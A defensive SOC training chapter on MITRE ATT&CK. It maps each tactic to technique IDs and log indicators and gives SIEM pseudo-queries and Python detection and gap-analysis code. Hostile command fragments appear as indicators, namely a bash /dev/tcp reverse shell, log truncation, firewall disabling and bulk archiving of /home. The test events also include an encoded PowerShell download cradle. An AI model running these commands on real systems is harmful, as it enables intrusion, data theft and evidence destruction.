MITRE ATT&CK Framework

MITRE ATT&CK is an openly published, widely adopted knowledge base of how real-world attackers operate. It catalogs the tactics, techniques, and sub-techniques that threat actors have been observed using during intrusions.
For SOC analysts, ATT&CK provides a common vocabulary and a structure for mapping observed activity, building detection rules, prioritizing alerts, and forming threat-hunting hypotheses.

This chapter explains ATT&CK from the SOC side: what each tactic looks like in logs, how technique IDs are used in incident mapping and SIEM rules, and how an intrusion moves through the framework from initial access to impact.


What the MITRE ATT&CK Framework Is

ATT&CK is a knowledge base of real adversary behavior, organized into:

  • Tactics (the adversary's goal at a given stage)

  • Techniques (how that goal is achieved)

  • Sub-techniques (more specific variants of a technique, such as T1059.001 PowerShell under T1059 Command and Scripting Interpreter)

  • Detections and data sources (which telemetry reveals a technique)

  • Mitigations (controls that reduce the risk of a technique)

  • Groups (threat-actor profiles with the techniques and software attributed to them)

  • Software (malware and tool profiles mapped to the techniques they implement)

SOC teams use it to:

  • Understand attack flow

  • Develop detections

  • Prioritize telemetry sources

  • Map incidents to known TTPs

  • Create threat hunting guides

  • Improve security posture

ATT&CK documents attacker behavior observed in real intrusions and public incident reporting, not theoretical attack models; every technique page cites the reports it was derived from.


ATT&CK Structure (Practical Breakdown)

The ATT&CK Enterprise matrix is organized into 14 tactics, each representing an adversary goal at one stage of an intrusion. The order is a loose lifecycle, not a strict sequence: real intrusions skip stages, repeat them, and run several at once (Defense Evasion happens throughout, and a Discovery command may fire seconds after Execution).

Below is a SOC-focused explanation of each tactic, with representative technique IDs and the log evidence each one leaves.


1. Reconnaissance

The attacker gathers information about the target before the intrusion.

Examples:

  • DNS enumeration (T1590.002)

  • Port scanning (T1595.001)

  • Crawling the victim's websites (T1594)

  • Buying leaked credentials (T1589.001)

Log Indicators:

IDS alerts such as ET SCAN Nmap Scripting Engine (an Emerging Threats signature)
Bursts of DNS queries for non-existent subdomains (NXDOMAIN responses) from one source

Most reconnaissance happens outside the SOC's visibility. What is visible, scanning of public-facing assets, is constant background noise; it is worth recording for later correlation but rarely worth an alert on its own.

2. Resource Development

Attackers build or acquire the infrastructure and tooling they will use.

Examples:

  • Register domains, often lookalikes of the target (T1583.001)

  • Acquire servers (T1583.003)

  • Build payloads (T1587.001)

  • Create fake accounts on email and social platforms (T1585)

The victim's own logs almost never show this stage. The SOC learns of it through threat-intelligence feeds (newly registered lookalike domains, known-bad infrastructure) and uses that intelligence for blocklists and retrospective hunting.


3. Initial Access

How the attacker gets a first foothold in the environment.

Examples:

  • Phishing (T1566)

  • Exploiting a public-facing application (T1190)

  • Logging in with valid, stolen credentials (T1078)

  • Internet-exposed remote services such as VPN or RDP (T1133)

Log Indicators:

WINWORD.EXE spawning powershell.exe shortly after a mail attachment was opened (a macro document delivered by phishing)
A run of failed logons (Event ID 4625) followed by a success (4624) for the same account from an external address

4. Execution

Running attacker-controlled code on a host.

Examples:

  • PowerShell (T1059.001)

  • Batch scripts and cmd.exe (T1059.003)

  • Linux shell scripts (T1059.004)

  • Office macros opened by the user (T1204.002)

  • Remote execution via WMI (T1047) or PsExec (T1569.002)

Indicators:

powershell.exe -enc … (a base64-encoded UTF-16LE command; an argument beginning JAB decodes to a $, i.e. a PowerShell variable)
A shell script run from /tmp or another world-writable path (sh /tmp/x.sh)

5. Persistence

Keeping a foothold across reboots, logoffs and password changes.

Examples:

  • Registry Run keys and Startup folders (T1547.001)

  • Cron jobs (T1053.003)

  • Scheduled tasks (T1053.005)

  • Malicious services (T1543.003 on Windows, T1543.002 systemd units on Linux)

Indicators:

Sysmon Event ID 13 (registry value set) under HKCU\...\Run, or Event ID 4698 (scheduled task created)
CRON: (root) CMD (/tmp/bd.py) in syslog: root running a script from a world-writable directory

6. Privilege Escalation

Gaining higher permissions than the initial foothold had.

Examples:

  • sudo abuse (T1548.003)

  • Kernel exploits (T1068)

  • Token manipulation (T1134)

  • DLL hijacking (T1574.001)

Indicators:

sudo: user : COMMAND=/bin/bash (a non-admin account obtaining a root shell)
4672 – Special privileges assigned to new logon (routine for administrators, suspicious for an account that should not have them)

7. Defense Evasion

Avoiding or disabling detection; this tactic runs throughout an intrusion rather than at one stage.

Examples:

  • Obfuscation (T1027)

  • Disabling AV or EDR (T1562.001)

  • Clearing logs (T1070)

  • Masquerading filenames (T1036)

Indicators:

powershell -w hidden (hidden window, T1564.003)
systemctl stop ufw or a host firewall rule change (T1562.004)
> /var/log/auth.log truncating a log file (T1070.002); on Windows, Event ID 1102 records the Security log being cleared (T1070.001)

8. Credential Access

Stealing credentials so that later steps can use legitimate access.

Examples:

  • Keylogging (T1056.001)

  • LSASS memory dumping (T1003.001)

  • SAM database dump (T1003.002)

  • SSH private key theft (T1552.004)

Indicators:

Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe from an unexpected SourceImage
Unexpected reads of /etc/shadow or ~/.ssh/id_* (auditd file watch); repeated authentication failures in /var/log/auth.log

9. Discovery

Learning the layout of the environment after gaining access.

Examples:

  • AD enumeration (T1087.002)

  • Network scanning (T1046)

  • Process listing (T1057)

  • File share discovery (T1135)

Indicators:

Get-ADUser -Filter * or net user /domain run from a workstation
nmap 10.0.0.0/24 from an internal host, or many connection attempts to many ports in a short window

10. Lateral Movement

Moving from the first compromised host to others.

Examples:

  • SMB and admin shares (T1021.002)

  • RDP (T1021.001)

  • SSH pivoting (T1021.004)

  • WinRM (T1021.006)

Indicators:

4624 LogonType 3 (network logon) from a source that has never authenticated to that host, often with 5140 (share accessed) for ADMIN$ or C$
SSH login from an internal workstation address rather than the usual jump host

11. Collection

Gathering the data of interest before exfiltration.

Examples:

  • Password and configuration files from local disk (T1005)

  • Database dumps

  • Browser-stored credentials (T1555.003, also listed under Credential Access)

  • Staging data in archives (T1560.001, T1074)

Indicators:

zip -r /tmp/data.zip /home/ (bulk archiving into a staging directory)
mysqldump ... run by an account or at a time that does not match the backup schedule

12. Command and Control (C2)

Maintaining remote control of compromised hosts.

Examples:

  • HTTP/HTTPS beaconing (T1071.001)

  • DNS C2 (T1071.004)

  • Reverse shells

  • Encrypted channels (T1573)

Indicators:

POST /status every 60s with near-constant request size (beaconing; look for low timing jitter)
TXT queries carrying long encoded strings
/dev/tcp/<ip>/4444 in a bash command line (a bash reverse shell)

13. Exfiltration

Removing data from the environment.

Examples:

  • HTTPS uploads over the C2 channel (T1041)

  • DNS tunneling (T1048.003)

  • Uploads to cloud storage (T1567.002)

  • Email exfiltration

Indicators:

POST /upload SIZE_OUT=6MB to an external host the organization has not talked to before
Long TXT DNS queries to a single domain, in volume

14. Impact

The final objective: denying, destroying or manipulating data and systems.

Examples:

  • Ransomware, including encryption of file servers and backups (T1486)

  • Data destruction (T1485)

  • Service disruption (T1489, T1499)

  • Forced shutdowns (T1529)

Indicators:

Mass file renames or new file extensions from one process within seconds (Sysmon 11 / Event ID 4663)
Unexpected system shutdown events (Event ID 1074)

How SOC Uses ATT&CK (Real Operations)

1. Incident Mapping

The SOC maps each observed event to an ATT&CK technique, using the sub-technique where the evidence supports it:

  • Execution → T1059.001 (Command and Scripting Interpreter: PowerShell)

  • Persistence → T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder)

  • C2 → T1071.001 (Application Layer Protocol: Web Protocols)

The tactic tells you how far the intrusion has progressed; evidence from later stages (Lateral Movement, Exfiltration, Impact) raises severity.


2. SIEM Use Case Development

Each detection rule is tagged with the technique(s) it covers. Most techniques need more than one rule, and a rule whose log source is not ingested is coverage on paper only.

Examples:

  • T1059.001: detect encoded PowerShell

  • T1078: detect logins that break an account's baseline (new source, new time, new host)

  • T1041 / T1048: detect large outbound POSTs to destinations not seen before

The technique tags are what let the SOC measure and extend its detection coverage.


3. Threat Hunting

Analysts hunt for:

  • Lateral movement (T1021 Remote Services)

  • Discovery (T1087 Account Discovery, T1049 System Network Connections Discovery)

  • Persistence (T1053 Scheduled Task/Job, T1547 Boot or Logon Autostart Execution)

Each technique page lists the data sources that reveal it, which is where a hunt's hypothesis starts.


4. Threat Intelligence Correlation

A threat-intelligence report might state:

APT29 uses T1059, T1087, T1071

The SOC first checks that it has telemetry and rules for those techniques, then searches its logs for them over the relevant time window.


5. Gap Analysis

An ATT&CK heat map (for example an ATT&CK Navigator layer, in which each technique cell is colored by a score) shows:

  • Which techniques the SOC detects today

  • Which techniques have rules but no telemetry behind them

  • Which techniques have no coverage at all

Organizations use this view to prioritize detection engineering and log onboarding.
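The gap analysis above, worked as an added Python example (this is not code from the chapter or from MITRE): it takes a constructed inventory of SIEM rules tagged with technique IDs, the log sources the SIEM actually ingests, and the APT29 technique list quoted in the previous section, classifies each technique as detected, rule-without-telemetry or gap, and emits an ATT&CK Navigator layer for the heat map. Rule names, log sources and the Navigator version fields are assumptions.

```python
import json

# Constructed rule inventory: every SIEM rule carries the technique IDs it is meant to
# cover and the log source it reads. Names and sources are this example's assumptions.
RULES = [
    {"name": "Encoded PowerShell", "techniques": ["T1059.001"], "source": "sysmon"},
    {"name": "Office app spawning shell", "techniques": ["T1566.001", "T1204.002"], "source": "sysmon"},
    {"name": "Run key modified", "techniques": ["T1547.001"], "source": "sysmon"},
    {"name": "Large outbound POST", "techniques": ["T1041"], "source": "proxy"},
    {"name": "AD account enumeration", "techniques": ["T1087.002"], "source": "windows_security"},
]
# Log sources the SIEM actually ingests (constructed). A rule on a source that is not
# ingested is paper coverage: it exists, but it can never fire.
INGESTED = {"sysmon", "proxy"}

# Techniques the chapter attributes to APT29 (T1059, T1087, T1071), used exactly as the
# text gives them. A real assessment takes the list from the ATT&CK Group page.
INTEL = {"APT29": ["T1059", "T1087", "T1071"]}


def related(rule_tid, intel_tid):
    """True if the rule's technique is the intel technique, its parent, or one of its sub-techniques."""
    return (rule_tid == intel_tid
            or rule_tid.startswith(intel_tid + ".")
            or intel_tid.startswith(rule_tid + "."))


def coverage(intel_tids, rules=RULES, ingested=INGESTED):
    """Classify each intel technique: detected (rule + telemetry), rule_without_telemetry, or gap."""
    status = {}
    for tid in intel_tids:
        matching = [r for r in rules if any(related(rt, tid) for rt in r["techniques"])]
        if any(r["source"] in ingested for r in matching):
            status[tid] = "detected"
        elif matching:
            status[tid] = "rule_without_telemetry"
        else:
            status[tid] = "gap"
    return status


def navigator_layer(status, name):
    """Emit an ATT&CK Navigator layer so the result can be loaded as a heat map.
    Score 2 = detected, 1 = rule but no telemetry, 0 = gap. The version fields are an
    assumption: set them to match the Navigator build you load the layer into."""
    score = {"detected": 2, "rule_without_telemetry": 1, "gap": 0}
    color = {"detected": "#8ec843", "rule_without_telemetry": "#ffe766", "gap": "#ff6666"}
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Detection coverage against threat-intel TTPs",
        "techniques": [{"techniqueID": tid, "score": score[s], "color": color[s], "comment": s}
                       for tid, s in sorted(status.items())],
    }


def gap_report(intel=INTEL):
    """Per actor: the technique status plus the list an engineer should work on first."""
    report = {}
    for actor, tids in intel.items():
        status = coverage(tids)
        report[actor] = {"status": status,
                         "work_items": [t for t, s in status.items() if s != "detected"]}
    return report


if __name__ == "__main__":
    print(json.dumps(gap_report(), indent=2))
    print(json.dumps(navigator_layer(coverage(INTEL["APT29"]), "APT29 coverage"), indent=2))
```

With the constructed inventory, T1059 is detected through the encoded-PowerShell rule (a sub-technique rule counts toward its parent), T1087 has a rule but its log source is not ingested, and T1071 has nothing; the work list therefore starts with onboarding the Windows Security log, then writing a beaconing rule.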


Practical Examples of ATT&CK Mappings

Example: PowerShell Malware Execution

WINWORD.exe → powershell.exe -enc JAB...

Mapped to:

  • T1566.001 (Phishing: Spearphishing Attachment)

  • T1204.002 (User Execution: Malicious File)

  • T1059.001 (Command and Scripting Interpreter: PowerShell)

  • T1105 (Ingress Tool Transfer), if the decoded command downloads a second stage

  • T1071.001 (Application Layer Protocol: Web Protocols), if that download or the follow-on traffic is HTTP(S) beaconing

Decode the -enc argument before mapping: the base64 is UTF-16LE, and the decoded script tells you whether the later techniques apply.


Example: RDP Lateral Movement

4624 LogonType=10 from an address that has never connected to this host

Mapped to:

  • T1021.001 (Remote Services: Remote Desktop Protocol)

  • T1078 (Valid Accounts)

  • T1110 (Brute Force), if 4625 failures preceded the success

LogonType 10 is RemoteInteractive, i.e. RDP. If the source address is internal this is Lateral Movement; if it is an external address, the same event is Initial Access via T1133 (External Remote Services).


Example: DNS Tunneling

TXT queries > 200 characters to one domain, in volume

Mapped to:

  • T1071.004 (Application Layer Protocol: DNS) when the channel carries C2

  • T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol) when it carries data out, or T1041 if DNS is also the C2 channel


SIEM Queries Using ATT&CK Technique IDs

These are pseudo-queries; adapt the field names and syntax to your SIEM.

Detect T1059.001 – PowerShell Execution

process_name:powershell.exe AND CommandLine:(*-enc* OR *-EncodedCommand*)

PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, …), and a bare *enc* wildcard also matches benign flags such as -Encoding, so the rule should match the prefix as a parameter and decode the argument (base64, UTF-16LE) before alerting.

Detect T1021.002 – SMB Lateral Movement

dst_port:445 AND src_ip:10.0.0.0/8 AND dst_ip:10.0.0.0/8 AND NOT (src_ip, dst_ip) IN baseline_pairs

Raw internal port-445 traffic is constant noise (file servers, printing, logon scripts). The signal is a source-to-destination pair never seen before, especially workstation to workstation, corroborated by 4624 LogonType 3 and 5140 share access on the destination.

Detect T1566 – Phishing

email_from_domain NOT IN(known_partners) AND (display_name:*microsoft* OR url_domain:lookalike_of(company_domain))

A rule such as URL:*login* OR email_from:*microsoft* fires on every legitimate Microsoft message. Phishing rarely detects well on a single field; pair sender-domain age and reputation with a downstream endpoint rule (an Office application spawning a shell).

Detect T1041 – Exfiltration Over Web

http_method:POST AND bytes_out > 1000000 AND NOT dst_ip:internal AND NOT dst_domain IN(sanctioned_cloud_storage)

Large POSTs to internal services and sanctioned SaaS are routine; the alert should key on volume to a destination the organization has not talked to before.

Tagging each rule with its technique ID is what makes the coverage heat map in the previous section possible.
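The pseudo-queries above, implemented as an added Python example over constructed sample events (this is not code from the chapter; the event field names and addresses are this example's assumptions). It shows the refinements the notes call for: the encoded-PowerShell rule matches any prefix of -EncodedCommand and decodes the payload so the alert contains the real command, the SMB rule compares each source/destination pair to a baseline, the exfiltration rule ignores internal destinations, and a DNS TXT length check covers the tunneling case from the mapping examples. The phishing rule is left out because it is not a single-field detection.

```python
import base64
import re
from ipaddress import ip_address, ip_network

# --- Constructed sample telemetry (not from any real environment) -------------------
# Each record is one normalised SIEM event; the field names are this example's own.
_ENC_CMD = base64.b64encode(
    "$c=New-Object Net.WebClient;$c.DownloadString('http://198.51.100.7/a')".encode("utf-16-le")
).decode()
EVENTS = [
    {"type": "process", "host": "WS01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + _ENC_CMD},
    # Benign: matches a naive CommandLine:*enc* wildcard but carries no encoded command.
    {"type": "process", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command \"Get-Content C:\\logs\\app.log -Encoding UTF8\""},
    {"type": "netflow", "src_ip": "10.0.1.25", "dst_ip": "10.0.1.30", "dst_port": 445, "bytes_out": 120000},
    {"type": "netflow", "src_ip": "10.0.1.25", "dst_ip": "10.0.0.5", "dst_port": 445, "bytes_out": 40000},
    {"type": "http", "src_ip": "10.0.1.25", "dst_ip": "203.0.113.9", "method": "POST",
     "uri": "/upload", "bytes_out": 6_000_000},
    # Benign: a big POST, but to an internal backup service.
    {"type": "http", "src_ip": "10.0.1.25", "dst_ip": "10.0.0.8", "method": "POST",
     "uri": "/api/backup", "bytes_out": 9_000_000},
    {"type": "dns", "src_ip": "10.0.1.25", "qtype": "TXT",
     "qname": ".".join(["abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmn"] * 4) + ".t.example"},
    {"type": "dns", "src_ip": "10.0.1.25", "qtype": "TXT", "qname": "_dmarc.example.com"},
]
# Workstation->server SMB pairs seen during a learning period (constructed baseline).
SMB_BASELINE = {("10.0.1.25", "10.0.0.5")}
# Explicit internal ranges rather than ipaddress.is_private, which also treats the
# documentation ranges used for the "external" addresses above as private.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match every prefix as a whole parameter rather than the literal substring "enc".
_PREFIXES = ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:" + "|".join(reversed(_PREFIXES)) + r")\s+([A-Za-z0-9+/=]{16,})")


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None if absent."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_t1059_001(events):
    """Encoded PowerShell: decode the payload so the alert shows what actually ran."""
    hits = []
    for e in events:
        if e["type"] == "process" and e["image"].lower() == "powershell.exe":
            decoded = decode_encoded_command(e["cmdline"])
            if decoded is not None:
                hits.append({"technique": "T1059.001", "host": e["host"],
                             "parent": e["parent"], "decoded": decoded})
    return hits


def detect_t1021_002(events, baseline=SMB_BASELINE):
    """SMB lateral movement: internal 445 traffic is constant noise, so alert only on a
    source->destination pair that is absent from the learned baseline."""
    return [{"technique": "T1021.002", "src": e["src_ip"], "dst": e["dst_ip"]}
            for e in events
            if e["type"] == "netflow" and e["dst_port"] == 445
            and is_internal(e["src_ip"]) and is_internal(e["dst_ip"])
            and (e["src_ip"], e["dst_ip"]) not in baseline]


def detect_t1041(events, min_bytes=1_000_000):
    """Large outbound POST: only external destinations count (the chapter's 1 MB threshold)."""
    return [{"technique": "T1041", "src": e["src_ip"], "dst": e["dst_ip"], "bytes_out": e["bytes_out"]}
            for e in events
            if e["type"] == "http" and e["method"] == "POST"
            and e["bytes_out"] >= min_bytes and not is_internal(e["dst_ip"])]


def detect_t1071_004(events, max_len=200):
    """DNS tunnelling: TXT queries whose full name exceeds the chapter's 200-character cue."""
    return [{"technique": "T1071.004", "src": e["src_ip"], "qname_len": len(e["qname"])}
            for e in events
            if e["type"] == "dns" and e["qtype"] == "TXT" and len(e["qname"]) > max_len]


def run_all(events):
    """Run every detector; the keys are the ATT&CK technique IDs the rules are tagged with."""
    return {"T1059.001": detect_t1059_001(events), "T1021.002": detect_t1021_002(events),
            "T1041": detect_t1041(events), "T1071.004": detect_t1071_004(events)}


if __name__ == "__main__":
    for tid, hits in run_all(EVENTS).items():
        print(tid, len(hits), hits)
```

Against the sample events each detector fires exactly once: the benign -Encoding command line, the baselined SMB pair, the internal 9 MB backup POST and the short _dmarc TXT query are all ignored, and the T1059.001 alert carries the decoded download cradle rather than a base64 blob.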


Full Attack Timeline Mapped to ATT&CK

1. Initial Access

T1566.001 – Spearphishing Attachment

User opens a malicious document from a phishing email

2. Execution

T1059.001 – PowerShell

WINWORD.EXE → powershell.exe -enc …

3. Persistence

T1547.001 – Registry Run Keys / Startup Folder

HKCU\...\Run\Updater

4. Privilege Escalation

T1548.003 – Abuse Elevation Control Mechanism: Sudo and Sudo Caching

sudo: user : COMMAND=/bin/bash on a Linux server in the same intrusion (a kernel or driver exploit would map to T1068, Exploitation for Privilege Escalation, instead)

5. Lateral Movement

T1021 – Remote Services (T1021.002 once share access confirms SMB)

4624 LogonType 3 on a server from the compromised workstation, with 5140 ADMIN$ access

6. Command and Control

T1071.001 – Application Layer Protocol: Web Protocols

POST /status every 60s to the same external host

7. Exfiltration

T1041 – Exfiltration Over C2 Channel

POST 6MB to the external server the beacon talks to

The numbering follows the tactic order, not the clock: in this chain the sudo event on the Linux server happened after the lateral movement that reached it. Mapping every event to a technique is what lets the analyst lay out the whole chain, see which stages have no evidence yet, and hunt for them.


Analyst Workflow Using ATT&CK

  1. Identify a suspicious event

  2. Map it to an ATT&CK technique (sub-technique where the evidence supports it)

  3. Identify the tactic and gather host, account and time context

  4. Check for the techniques that typically precede and follow it

  5. Validate whether it is part of a larger attack chain or an isolated false positive

  6. Run the detections and hunts for adjacent techniques on the same host and account

  7. Build a timeline across tactics and hosts

  8. Escalate with the ATT&CK mapping attached, so the responder inherits the context

This gives SOC investigations a consistent structure and a vocabulary the next analyst can pick up.
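The eight-step workflow and the attack timeline above, as an added Python example (not part of this chapter): it takes constructed incident evidence already mapped to technique IDs, attaches a tactic to each item (resolving techniques that sit under several tactics, such as T1078, from the stage the intrusion had reached), builds the cross-host timeline, lists the tactics between the first and last observed stage that have no evidence yet (the hunting prompts of step 4), and derives a severity for escalation. The technique table is a hand-copied subset of ATT&CK and the severity thresholds are this example's assumption.

```python
# Tactic order of the ATT&CK Enterprise matrix, as listed in this chapter.
TACTICS = ["Reconnaissance", "Resource Development", "Initial Access", "Execution",
           "Persistence", "Privilege Escalation", "Defense Evasion", "Credential Access",
           "Discovery", "Lateral Movement", "Collection", "Command and Control",
           "Exfiltration", "Impact"]

# Technique -> (name, tactics it appears under). A subset transcribed for this example;
# a production tool would load MITRE's full STIX bundle. T1078 and T1547.001 sit under
# more than one tactic, which is why a tactic has to be resolved per event.
TECHNIQUES = {
    "T1566.001": ("Spearphishing Attachment", ["Initial Access"]),
    "T1204.002": ("Malicious File", ["Execution"]),
    "T1059.001": ("PowerShell", ["Execution"]),
    "T1547.001": ("Registry Run Keys / Startup Folder", ["Persistence", "Privilege Escalation"]),
    "T1003.001": ("LSASS Memory", ["Credential Access"]),
    "T1078": ("Valid Accounts", ["Defense Evasion", "Persistence", "Privilege Escalation", "Initial Access"]),
    "T1021.002": ("SMB/Windows Admin Shares", ["Lateral Movement"]),
    "T1071.001": ("Web Protocols", ["Command and Control"]),
    "T1041": ("Exfiltration Over C2 Channel", ["Exfiltration"]),
}

# Constructed incident evidence (not real logs): (time, host, technique, evidence).
EVIDENCE = [
    ("2024-05-02T09:00:00", "WS01", "T1566.001", "mail gateway: invoice.docm from external sender"),
    ("2024-05-02T09:02:10", "WS01", "T1204.002", "WINWORD.EXE opened invoice.docm"),
    ("2024-05-02T09:02:15", "WS01", "T1059.001", "WINWORD.EXE -> powershell.exe -enc JAB..."),
    ("2024-05-02T09:05:00", "WS01", "T1547.001", "HKCU\\...\\Run\\Updater set (Sysmon 13)"),
    ("2024-05-02T09:06:00", "WS01", "T1071.001", "POST /status every 60 s to 203.0.113.9"),
    ("2024-05-02T09:20:00", "WS01", "T1003.001", "Sysmon 10: lsass.exe opened by unknown.exe"),
    ("2024-05-02T09:40:00", "SRV01", "T1078", "4624 LogonType 3 jdoe from 10.0.1.25"),
    ("2024-05-02T09:40:05", "SRV01", "T1021.002", "5140: ADMIN$ accessed from 10.0.1.25"),
    ("2024-05-02T10:15:00", "WS01", "T1041", "POST /upload 6 MB to 203.0.113.9"),
]
LEVELS = ["medium", "high", "critical"]


def resolve_tactic(technique, previous_tactic):
    """Pick one tactic for a multi-tactic technique from the stage already reached: the
    first candidate at or after it, otherwise the latest candidate before it."""
    candidates = sorted(TECHNIQUES[technique][1], key=TACTICS.index)
    if previous_tactic is None:
        return candidates[0]
    later = [t for t in candidates if TACTICS.index(t) >= TACTICS.index(previous_tactic)]
    return later[0] if later else candidates[-1]


def build_timeline(evidence):
    """Workflow steps 2, 3 and 7: order the evidence and attach a tactic to each item.
    A host with no context yet inherits the stage the intrusion reached elsewhere."""
    timeline, last_on_host, last_overall = [], {}, None
    for ts, host, tid, note in sorted(evidence):
        tactic = resolve_tactic(tid, last_on_host.get(host, last_overall))
        last_on_host[host] = last_overall = tactic
        timeline.append({"time": ts, "host": host, "technique": tid,
                         "name": TECHNIQUES[tid][0], "tactic": tactic, "evidence": note})
    return timeline


def chain_gaps(timeline):
    """Step 4: per host, tactics between the first and last observed stage with no evidence.
    These are the hunting prompts: what should have happened that has not been seen."""
    seen = {}
    for item in timeline:
        seen.setdefault(item["host"], set()).add(TACTICS.index(item["tactic"]))
    return {host: [TACTICS[i] for i in range(min(idx), max(idx) + 1) if i not in idx]
            for host, idx in seen.items()}


def severity(timeline):
    """Step 8: severity from the furthest stage reached on each host. The thresholds
    (Lateral Movement and beyond = high, Exfiltration and beyond = critical) are this
    example's assumption, not an ATT&CK rule."""
    out = {}
    for item in timeline:
        i = TACTICS.index(item["tactic"])
        level = ("critical" if i >= TACTICS.index("Exfiltration")
                 else "high" if i >= TACTICS.index("Lateral Movement") else "medium")
        out[item["host"]] = max(out.get(item["host"], "medium"), level, key=LEVELS.index)
    return out


if __name__ == "__main__":
    tl = build_timeline(EVIDENCE)
    for item in tl:
        print(item["time"], item["host"], item["tactic"], item["technique"], item["evidence"])
    print("gaps:", chain_gaps(tl))
    print("severity:", severity(tl))
```

On the constructed evidence, WS01 ends at Exfiltration (critical) with no evidence yet for Privilege Escalation, Defense Evasion, Discovery, Lateral Movement or Collection, and SRV01 shows a valid-account logon followed by admin-share access but nothing under Credential Access or Discovery; those gap lists are what the analyst takes into step 6.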


Intel Dump

  • MITRE ATT&CK organizes observed attacker behavior into tactics, techniques and sub-techniques.

  • The 14 Enterprise tactics represent attacker goals; techniques show how those goals are achieved.

  • SOC uses ATT&CK for detection engineering, incident mapping, threat hunting, threat-intel correlation and gap analysis.

  • Most intrusion steps leave logs that map to ATT&CK techniques under Execution, Persistence, Lateral Movement, Exfiltration and the other tactics.

  • ATT&CK-tagged SIEM rules cover encoded PowerShell, abnormal logins, DNS tunneling, beaconing and malware downloads; the tags are what make coverage measurable.

  • ATT&CK helps reconstruct entire kill chains from initial access to impact.
